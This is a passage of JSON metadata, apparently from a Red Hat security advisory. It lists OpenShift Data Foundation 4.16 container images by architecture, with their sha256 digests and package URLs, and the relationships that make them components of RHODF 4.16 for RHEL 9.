"purl": "pkg:oci/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odr-cluster-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le",
"product": {
"name": "odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le",
"product_id": "odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odr-hub-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le",
"product": {
"name": "odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le",
"product_id": "odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odr-rhel9-operator\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le",
"product": {
"name": "odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le",
"product_id": "odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odr-recipe-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le",
"product": {
"name": "odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le",
"product_id": "odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/rook-ceph-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le",
"product": {
"name": "odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le",
"product_id": "odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/rook-ceph-rhel9-operator\u0026tag=v4.16.3-1"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64",
"product": {
"name": "odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64",
"product_id": "odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64",
"product_identification_helper": {
"purl": "pkg:oci/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e?arch=arm64\u0026repository_url=registry.redhat.io/odf4/mcg-core-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64",
"product": {
"name": "odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64",
"product_id": "odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64",
"product_identification_helper": {
"purl": "pkg:oci/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2?arch=arm64\u0026repository_url=registry.redhat.io/odf4/mcg-rhel9-operator\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64",
"product": {
"name": "odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64",
"product_id": "odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64",
"product_identification_helper": {
"purl": "pkg:oci/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8?arch=arm64\u0026repository_url=registry.redhat.io/odf4/ocs-client-rhel9-operator\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64",
"product": {
"name": "odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64",
"product_id": "odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64",
"product_identification_helper": {
"purl": "pkg:oci/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f?arch=arm64\u0026repository_url=registry.redhat.io/odf4/ocs-rhel9-operator\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64",
"product": {
"name": "odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64",
"product_id": "odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64",
"product_identification_helper": {
"purl": "pkg:oci/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121?arch=arm64\u0026repository_url=registry.redhat.io/odf4/odf-cli-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64",
"product": {
"name": "odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64",
"product_id": "odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64",
"product_identification_helper": {
"purl": "pkg:oci/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0?arch=arm64\u0026repository_url=registry.redhat.io/odf4/odf-csi-addons-rhel9-operator\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64",
"product": {
"name": "odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64",
"product_id": "odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64",
"product_identification_helper": {
"purl": "pkg:oci/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235?arch=arm64\u0026repository_url=registry.redhat.io/odf4/odf-csi-addons-sidecar-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64",
"product": {
"name": "odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64",
"product_id": "odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64",
"product_identification_helper": {
"purl": "pkg:oci/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8?arch=arm64\u0026repository_url=registry.redhat.io/odf4/odf-multicluster-rhel9-operator\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64",
"product": {
"name": "odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64",
"product_id": "odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64",
"product_identification_helper": {
"purl": "pkg:oci/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57?arch=arm64\u0026repository_url=registry.redhat.io/odf4/odf-must-gather-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64",
"product": {
"name": "odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64",
"product_id": "odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64",
"product_identification_helper": {
"purl": "pkg:oci/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b?arch=arm64\u0026repository_url=registry.redhat.io/odf4/odf-rhel9-operator\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64",
"product": {
"name": "odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64",
"product_id": "odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64",
"product_identification_helper": {
"purl": "pkg:oci/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb?arch=arm64\u0026repository_url=registry.redhat.io/odf4/odr-rhel9-operator\u0026tag=v4.16.3-1"
}
}
}
],
"category": "architecture",
"name": "arm64"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le"
},
"product_reference": "odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64"
},
"product_reference": "odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x"
},
"product_reference": "odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le"
},
"product_reference": "odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x"
},
"product_reference": "odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64"
},
"product_reference": "odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64"
},
"product_reference": "odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x"
},
"product_reference": "odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64"
},
"product_reference": "odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le"
},
"product_reference": "odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64"
},
"product_reference": "odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le"
},
"product_reference": "odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64"
},
"product_reference": "odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x"
},
"product_reference": "odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x"
},
"product_reference": "odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le"
},
"product_reference": "odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64"
},
"product_reference": "odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64"
},
"product_reference": "odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x"
},
"product_reference": "odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le"
},
"product_reference": "odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le"
},
"product_reference": "odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64"
},
"product_reference": "odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x"
},
"product_reference": "odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64"
},
"product_reference": "odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le"
},
"product_reference": "odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x"
},
"product_reference": "odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64"
},
"product_reference": "odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64"
},
"product_reference": "odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
